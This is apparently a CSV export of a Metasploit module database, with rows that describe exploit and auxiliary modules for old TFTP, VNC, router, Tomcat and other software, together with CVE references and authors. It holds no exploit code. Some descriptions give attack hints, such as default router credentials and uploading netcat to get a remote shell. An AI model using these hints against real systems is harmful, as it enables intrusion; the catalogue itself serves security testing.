1103,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/tftpdwin_long_filename.rb","exploit","windows/tftp/tftpdwin_long_filename","exploit/windows/tftp/tftpdwin_long_filename","TFTPDWIN v0.4.2 Long Filename Buffer Overflow",500,"This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten.","Metasploit Framework License (BSD)","f","2006-09-21 00:00:00",0,,"aggressive","t","BID-20131, CVE-2006-4948, EDB-3132, OSVDB-29032","patrick " 1104,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb","exploit","windows/tftp/tftpserver_wrq_bof","exploit/windows/tftp/tftpserver_wrq_bof","TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",300,"This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw is due to the way TFTP handles the filename parameter extracted from a WRQ request. The server will append the user-supplied filename to TFTP server binary's path without any bounds checking, and then attempt to check this path with a fopen(). Since this isn't a valid file path, fopen() returns null, which allows the corrupted data to be used in a strcmp() function, causing an access violation. Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' , and then manually select your target accordingly. A successful attempt will lead to remote code execution under the context of SYSTEM if run as a service, or the user if run as a standalone. A failed attempt will result a denial-of-service.","Metasploit Framework License (BSD)","f","2008-03-26 00:00:00",4,,"aggressive","t","BID-18345, CVE-2008-1611, EDB-5314, OSVDB-43785","Datacut, Mati Aharoni" 1105,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb","exploit","windows/tftp/threectftpsvc_long_mode","exploit/windows/tftp/threectftpsvc_long_mode","3CTftpSvc TFTP Long Mode Buffer Overflow",500,"This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","t","2006-11-27 00:00:00",0,,"aggressive","t","BID-21301, CVE-2006-6183, OSVDB-30758, URL-http://secunia.com/advisories/23113/","MC " 1106,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/unicenter/cam_log_security.rb","exploit","windows/unicenter/cam_log_security","exploit/windows/unicenter/cam_log_security","CA CAM log_security() Stack Buffer Overflow (Win32)",500,"This module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. This module has been tested on Unicenter v3.1.","Metasploit Framework License (BSD)","t","2005-08-22 00:00:00",0,,"aggressive","t","BID-14622, CVE-2005-2668, OSVDB-18916","hdm " 1107,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/realvnc_client.rb","exploit","windows/vnc/realvnc_client","exploit/windows/vnc/realvnc_client","RealVNC 3.3.7 Client Buffer Overflow",300,"This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).","Metasploit Framework License (BSD)","f","2001-01-29 00:00:00",0,,"passive","t","BID-2305, CVE-2001-0167, OSVDB-6281","MC " 1108,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/ultravnc_client.rb","exploit","windows/vnc/ultravnc_client","exploit/windows/vnc/ultravnc_client","UltraVNC 1.0.1 Client Buffer Overflow",300,"This module exploits a buffer overflow in UltraVNC Win32 Viewer 1.0.1 Release.","Metasploit Framework License (BSD)","f","2006-04-04 00:00:00",0,,"passive","t","BID-17378, CVE-2006-1652, OSVDB-24456","MC " 1109,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb","exploit","windows/vnc/ultravnc_viewer_bof","exploit/windows/vnc/ultravnc_viewer_bof","UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",300,"This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.","Metasploit Framework License (BSD)","f","2008-02-06 00:00:00",0,,"passive","t","BID-27561, CVE-2008-0610, OSVDB-42840","noperand" 1110,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/winvnc_http_get.rb","exploit","windows/vnc/winvnc_http_get","exploit/windows/vnc/winvnc_http_get","WinVNC Web Server <= v3.3.3r7 GET Overflow",200,"This module exploits a buffer overflow in the AT&T WinVNC version <= v3.3.3r7 web server. When debugging mode with logging is enabled (non-default), an overly long GET request can overwrite the stack. This exploit does not work well with VNC payloads!","Metasploit Framework License (BSD)","t","2001-01-29 00:00:00",1,,"aggressive","t","BID-2306, CVE-2001-0168, OSVDB-6280","patrick " 1111,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vpn/safenet_ike_11.rb","exploit","windows/vpn/safenet_ike_11","exploit/windows/vpn/safenet_ike_11","SafeNet SoftRemote IKE Service Buffer Overflow",200,"This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe service. When sending a specially crafted udp packet to port 62514 an attacker may be able to execute arbitrary code. This module has been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using windows/meterpreter/reverse_ord_tcp payloads.","Metasploit Framework License (BSD)","t","2009-06-01 00:00:00",0,,"aggressive","t","BID-35154, CVE-2009-1943, OSVDB-54831, URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1","MC " 1112,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/winrm/winrm_script_exec.rb","exploit","windows/winrm/winrm_script_exec","exploit/windows/winrm/winrm_script_exec","WinRM Script Exec Remote Code Execution",0,"This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. The module will check if Powershell 2.0 is available, and if so uses that method. Otherwise it falls back to the VBS Cmdstager which is less stealthy. IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.","Metasploit Framework License (BSD)","t","2012-11-01 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx","thelightcosine" 1113,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/wins/ms04_045_wins.rb","exploit","windows/wins/ms04_045_wins","exploit/windows/wins/ms04_045_wins","Microsoft WINS Service Memory Overwrite",500,"This module exploits an arbitrary memory write flaw in the WINS service. This exploit has been tested against Windows 2000 only.","Metasploit Framework License (BSD)","t","2004-12-14 00:00:00",0,,"aggressive","t","BID-11763, CVE-2004-1080, MSB-MS04-045, OSVDB-12378","hdm " 1114,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/2wire/xslt_password_reset.rb","auxiliary","admin/2wire/xslt_password_reset","auxiliary/admin/2wire/xslt_password_reset","2Wire Cross-Site Request Forgery Password Reset Vulnerability",300,"This module will reset the admin password on a 2Wire wireless router. This is done by using the /xslt page where authentication is not required, thus allowing configuration changes (such as resetting the password) as administrators.","Metasploit Framework License (BSD)","f","2007-08-15 00:00:00",,,"aggressive","t","BID-36075, CVE-2007-4387, OSVDB-37667, URL-http://seclists.org/bugtraq/2007/Aug/225","Travis Phillips, hkm " 1115,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/backupexec/dump.rb","auxiliary","admin/backupexec/dump","auxiliary/admin/backupexec/dump","Veritas Backup Exec Windows Remote File Access",300,"This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash.","Metasploit Framework License (BSD)","f",,,"Download","aggressive","t","BID-14551, CVE-2005-2611, OSVDB-18695, URL-http://www.fpns.net/willy/msbksrc.lzh","Unknown, hdm " 1116,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/backupexec/registry.rb","auxiliary","admin/backupexec/registry","auxiliary/admin/backupexec/registry","Veritas Backup Exec Server Registry Access",300,"This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based on the NDR stub information information posted to openrce.org. Please see the action list for the different attack modes.","Metasploit Framework License (BSD)","f",,,"System Information","aggressive","t","CVE-2005-0771, OSVDB-17627, URL-http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities","hdm " 1117,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb","auxiliary","admin/cisco/cisco_secure_acs_bypass","auxiliary/admin/cisco/cisco_secure_acs_bypass","Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change",300,"This module exploits an authentication bypass issue which allows arbitrary password change requests to be issued for any user in the local store. Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well as version 5.2 with either no patches or patches 1 and 2 are vulnerable.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-47093, CVE-2011-0951, URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html","Jason Kratzer " 1118,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb","auxiliary","admin/cisco/vpn_3000_ftp_bypass","auxiliary/admin/cisco/vpn_3000_ftp_bypass","Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",300,"This module tests for a logic vulnerability in the Cisco VPN Concentrator 3000 series. It is possible to execute some FTP statements without authentication (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs when working with CWD commands. This module simply creates an arbitrary directory, verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug.","Metasploit Framework License (BSD)","f","2006-08-23 00:00:00",,,"aggressive","t","BID-19680, CVE-2006-4313, OSVDB-28138, OSVDB-28139, URL-http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml","patrick " 1119,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/db2/db2rcmd.rb","auxiliary","admin/db2/db2rcmd","auxiliary/admin/db2/db2rcmd","IBM DB2 db2rcmd.exe Command Execution Vulnerability",300,"This module exploits a vulnerability in the Remote Command Server component in IBM's DB2 Universal Database 8.1. An authenticated attacker can send arbitrary commands to the DB2REMOTECMD named pipe which could lead to administrator privileges.","Metasploit Framework License (BSD)","f","2004-03-04 00:00:00",,,"aggressive","t","BID-9821, CVE-2004-0795, OSVDB-4180","MC " 1120,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb","auxiliary","admin/edirectory/edirectory_dhost_cookie","auxiliary/admin/edirectory/edirectory_dhost_cookie","Novell eDirectory DHOST Predictable Session Cookie",300,"This module is able to predict the next session cookie value issued by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run this module, wait until the real administrator logs in, then specify the predicted cookie value to hijack their session.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-60035","hdm " 1121,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb","auxiliary","admin/edirectory/edirectory_edirutil","auxiliary/admin/edirectory/edirectory_edirutil","Novell eDirectory eMBox Unauthenticated File Access",300,"This module will access Novell eDirectory's eMBox service and can run the following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES, STOP_SERVICE, START_SERVICE, SET_LOGFILE.","Metasploit Framework License (BSD)","f",,,"LIST_SERVICES","aggressive","t","BID-28441, CVE-2008-0926, OSVDB-43690","MC , Nicob, sinn3r " 1122,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb","auxiliary","admin/emc/alphastor_devicemanager_exec","auxiliary/admin/emc/alphastor_devicemanager_exec","EMC AlphaStor Device Manager Arbitrary Command Execution",300,"EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","f","2008-05-27 00:00:00",,,"aggressive","t","BID-29398, CVE-2008-2157, OSVDB-45715, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703","MC " 1123,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb","auxiliary","admin/emc/alphastor_librarymanager_exec","auxiliary/admin/emc/alphastor_librarymanager_exec","EMC AlphaStor Library Manager Arbitrary Command Execution",300,"EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","f","2008-05-27 00:00:00",,,"aggressive","t","BID-29398, CVE-2008-2157, OSVDB-45715, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703","MC " 1124,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb","auxiliary","admin/hp/hp_data_protector_cmd","auxiliary/admin/hp/hp_data_protector_cmd","HP Data Protector 6.1 EXEC_CMD Command Execution",300,"This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file is found, the process will then go ahead execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bails early without triggering CreateProcess(). Because of these behaviors, if you try to supply an argument, FindFirstFileW() will look at that as part of the filename, and then bail. Please note that when you specify the 'CMD' option, the base path begins under C:\.","Metasploit Framework License (BSD)","f","2011-02-07 00:00:00",,,"aggressive","t","CVE-2011-0923, OSVDB-72526, URL-http://c4an-dl.blogspot.com/hp-data-protector-vuln.html, URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-055/","c4an, ch0ks, sinn3r , wireghoul" 1125,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/axigen_file_access.rb","auxiliary","admin/http/axigen_file_access","auxiliary/admin/http/axigen_file_access","Axigen Arbitrary File Read and Delete",300,"This module exploits a directory traversal vulnerability in the WebAdmin interface of Axigen, which allows an authenticated user to read and delete arbitrary files with SYSTEM privileges. The vulnerability is known to work on Windows platforms. This module has been tested successfully on Axigen 8.10 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f","2012-10-31 00:00:00",,"Read","aggressive","t","CVE-2012-4940, OSVDB-86802, US-CERT-VU-586556","Zhao Liang, juan vazquez " 1126,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb","auxiliary","admin/http/contentkeeper_fileaccess","auxiliary/admin/http/contentkeeper_fileaccess","ContentKeeper Web Appliance mimencode File Access",300,"This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary files outside of the webroot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-54551, URL-http://www.aushack.com/200904-contentkeeper.txt","patrick " 1127,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb","auxiliary","admin/http/dlink_dir_300_600_exec_noauth","auxiliary/admin/http/dlink_dir_300_600_exec_noauth","D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution",300,"This module exploits an OS Command Injection vulnerability in some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in command.php, which is accessible without authentication. This module has been tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. In order to get a remote shell the telnetd could be started without any authentication.","Metasploit Framework License (BSD)","f","2013-02-04 00:00:00",,,"aggressive","t","EDB-24453, OSVDB-89861, URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router, URL-http://www.s3cur1ty.de/home-network-horror-days, URL-http://www.s3cur1ty.de/m1adv2013-003","Michael Messner " 1128,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb","auxiliary","admin/http/dlink_dir_645_password_extractor","auxiliary/admin/http/dlink_dir_645_password_extractor","DLink DIR 645 Password Extractor",300,"This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. With this vulnerability you are able to extract the password for the remote management.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58231, OSVDB-90733, URL-http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt","Michael Messner , Roberto Paleari " 1129,"2013-05-13 05:04:44","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb","auxiliary","admin/http/dlink_dsl320b_password_extractor","auxiliary/admin/http/dlink_dsl320b_password_extractor","DLink DSL 320B Password Extractor",300,"This module exploits an authentication bypass vulnerability in DLink DSL 320B <=v1.23. This vulnerability allows to extract the credentials for the remote management interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","EDB-25252, OSVDB-93013, URL-http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem, URL-http://www.s3cur1ty.de/m1adv2013-018","Michael Messner " 1130,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb","auxiliary","admin/http/hp_web_jetadmin_exec","auxiliary/admin/http/hp_web_jetadmin_exec","HP Web JetAdmin 6.5 Server Arbitrary Command Execution",300,"This module abuses a command execution vulnerability within the web based management console of the Hewlett-Packard Web JetAdmin network printer tool v6.2 - v6.5. It is possible to execute commands as SYSTEM without authentication. The vulnerability also affects POSIX systems, however at this stage the module only works against Windows. This module does not apply to HP printers.","Metasploit Framework License (BSD)","f","2004-04-27 00:00:00",,,"aggressive","t","BID-10224, EDB-294, OSVDB-5798","patrick " 1131,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/iis_auth_bypass.rb","auxiliary","admin/http/iis_auth_bypass","auxiliary/admin/http/iis_auth_bypass","MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",300,"This module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.","Metasploit Framework License (BSD)","f","2010-07-02 00:00:00",,,"aggressive","t","CVE-2010-2731, MSB-MS10-065, OSVDB-66160, URL-http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/","Soroush Dalili, sinn3r " 1132,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/intersil_pass_reset.rb","auxiliary","admin/http/intersil_pass_reset","auxiliary/admin/http/intersil_pass_reset","Intersil (Boa) HTTPd Basic Authentication Password Reset",300,"The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11 allows basic authentication bypass when the user string is greater than 127 bytes long. The long string causes the password to be overwritten in memory, which enables the attacker to reset the password. In addition, the malicious attempt also may cause a denial-of-service condition. Please note that you must set the request URI to the directory that requires basic authentication in order to work properly.","Metasploit Framework License (BSD)","f","2007-09-10 00:00:00",,,"aggressive","t","BID-25676, URL-http://packetstormsecurity.org/files/59347/boa-bypass.txt.html","Claudio ""paper"" Merloni , Luca ""ikki"" Carettoni , Max Dietz " 1133,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb","auxiliary","admin/http/iomega_storcenterpro_sessionid","auxiliary/admin/http/iomega_storcenterpro_sessionid","Iomega StorCenter Pro NAS Web Authentication Bypass",300,"The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs, allowing for simple brute force attacks to bypass authentication and gain administrative access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2009-2367, OSVDB-55586","patrick " 1134,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/jboss_seam_exec.rb","auxiliary","admin/http/jboss_seam_exec","auxiliary/admin/http/jboss_seam_exec","JBoss Seam 2 Remote Command Execution",300,"JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.","Metasploit Framework License (BSD)","f","2010-07-19 00:00:00",,,"aggressive","t","CVE-2010-1871, OSVDB-66881","guerrino di massa" 1135,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb","auxiliary","admin/http/linksys_e1500_e2500_exec","auxiliary/admin/http/linksys_e1500_e2500_exec","Linksys E1500/E2500 Remote Command Execution",300,"Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command. A ping command against a controlled system for can be used for testing purposes.","Metasploit Framework License (BSD)","f","2013-02-05 00:00:00",,,"aggressive","t","BID-57760, EDB-24475, OSVDB-89912, URL-http://homesupport.cisco.com/de-eu/support/routers/E1500, URL-http://www.s3cur1ty.de/m1adv2013-004","Michael Messner " 1136,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb","auxiliary","admin/http/linksys_wrt54gl_exec","auxiliary/admin/http/linksys_wrt54gl_exec","Linksys WRT54GL Remote Command Execution",300,"Some Linksys Routers are vulnerable to OS Command injection. You will need credentials to the web interface to access the vulnerable part of the application. Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. Note: This is a blind OS command injection vulnerability. This means that you will not see any output of your command. Try a ping command to your local system and observe the packets with tcpdump (or equivalent) for a first test. Hint: To get a remote shell you could upload a netcat binary and exec it. WARNING: this module will overwrite network and DHCP configuration.","Metasploit Framework License (BSD)","f","2013-01-18 00:00:00",,,"aggressive","t","BID-57459, EDB-24202, OSVDB-89421, URL-http://homesupport.cisco.com/en-eu/support/routers/WRT54GL, URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl, URL-http://www.s3cur1ty.de/m1adv2013-01","Michael Messner " 1137,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb","auxiliary","admin/http/mutiny_frontend_read_delete","auxiliary/admin/http/mutiny_frontend_read_delete","Mutiny 5 Arbitrary File Read and Delete",300,"This module exploits the EditDocument servlet from the frontend on the Mutiny 5 appliance. The EditDocument servlet provides file operations, such as copy and delete, which are affected by a directory traversal vulnerability. Because of this, any authenticated frontend user can read and delete arbitrary files from the system with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.","Metasploit Framework License (BSD)","f","2013-05-15 00:00:00",,"Read","aggressive","t","CVE-2013-0136, URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities, US-CERT-VU-701572","juan vazquez " 1138,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb","auxiliary","admin/http/novell_file_reporter_filedelete","auxiliary/admin/http/novell_file_reporter_filedelete","Novell File Reporter Agent Arbitrary File Delete",300,"NFRAgent.exe in Novell File Reporter allows remote attackers to delete arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on Windows platforms.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-2750, OSVDB-73729, URL-http://aluigi.org/adv/nfr_2-adv.txt","Luigi Auriemma, juan vazquez " 1139,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/rails_devise_pass_reset.rb","auxiliary","admin/http/rails_devise_pass_reset","auxiliary/admin/http/rails_devise_pass_reset","Ruby on Rails Devise Authentication Password Reset",300,"The Devise authentication gem for Ruby on Rails is vulnerable to a password reset exploit leveraging type confusion. By submitting XML to rails, we can influence the type used for the reset_password_token parameter. This allows for resetting passwords of arbitrary accounts, knowing only the associated email address. This module defaults to the most common devise URIs and response values, but these may require adjustment for implementations which customize them. Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation of this vulnerability, by quoting numeric values when comparing them with non numeric values.","Metasploit Framework License (BSD)","f","2013-01-28 00:00:00",,,"aggressive","t","BID-57577, CVE-2013-0233, OSVDB-89642, URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/, URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html, URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8, URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8","jjarmoc, joernchen" 1140,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/scrutinizer_add_user.rb","auxiliary","admin/http/scrutinizer_add_user","auxiliary/admin/http/scrutinizer_add_user","Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass",300,"This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer without any authentication. Versions such as 9.0.1 or older are affected.","Metasploit Framework License (BSD)","f","2012-07-27 00:00:00",,,"aggressive","t","CVE-2012-2626, OSVDB-84318, URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt","Jonathan Claudius, MC , Tanya Secker, sinn3r " 1141,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/tomcat_administration.rb","auxiliary","admin/http/tomcat_administration","auxiliary/admin/http/tomcat_administration","Tomcat Administration Tool Default Access",300,"Detect the Tomcat administration interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://tomcat.apache.org/","Matteo Cantoni " 1142,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb","auxiliary","admin/http/tomcat_utf8_traversal","auxiliary/admin/http/tomcat_utf8_traversal","Tomcat UTF-8 Directory Traversal Vulnerability",300,"This module tests whether a directory traversal vulnerablity is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the vulnerability actually occurs within Java and not Tomcat; the server must use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2008-2938, OSVDB-47464, URL-http://tomcat.apache.org/, URL-http://www.securityfocus.com/archive/1/499926","guerrino di massa, patrick " 1143,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb","auxiliary","admin/http/trendmicro_dlp_traversal","auxiliary/admin/http/trendmicro_dlp_traversal","TrendMicro Data Loss Prevention 5.5 Directory Traversal",300,"This module tests whether a directory traversal vulnerablity is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. The vulnerability appears to be actually caused by the Tomcat UTF-8 bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938. This module simply tests for the same bug with Trend Micro specific settings. Note that in the Trend Micro appliance, /etc/shadow is not used and therefore password hashes are stored and anonymously accessible in the passwd file.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-48225, CVE-2008-2938, EDB-17388, OSVDB-47464, OSVDB-73447, URL-http://tomcat.apache.org/, URL-http://www.securityfocus.com/archive/1/499926","patrick " 1144,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_sa_2009_001.rb","auxiliary","admin/http/typo3_sa_2009_001","auxiliary/admin/http/typo3_sa_2009_001","TYPO3 sa-2009-001 Weak Encryption Key File Disclosure",300,"This module exploits a flaw in TYPO3 encryption ey creation process to allow for file disclosure in the jumpUrl mechanism. This flaw can be used to read any file that the web server user account has access to view.","Metasploit Framework License (BSD)","f","2009-01-20 00:00:00",,,"aggressive","t","OSVDB-51536, URL-http://blog.c22.cc/advisories/typo3-sa-2009-001, URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/","Chris John Riley" 1145,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_sa_2009_002.rb","auxiliary","admin/http/typo3_sa_2009_002","auxiliary/admin/http/typo3_sa_2009_002","Typo3 sa-2009-002 File Disclosure",300,"This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.","Metasploit 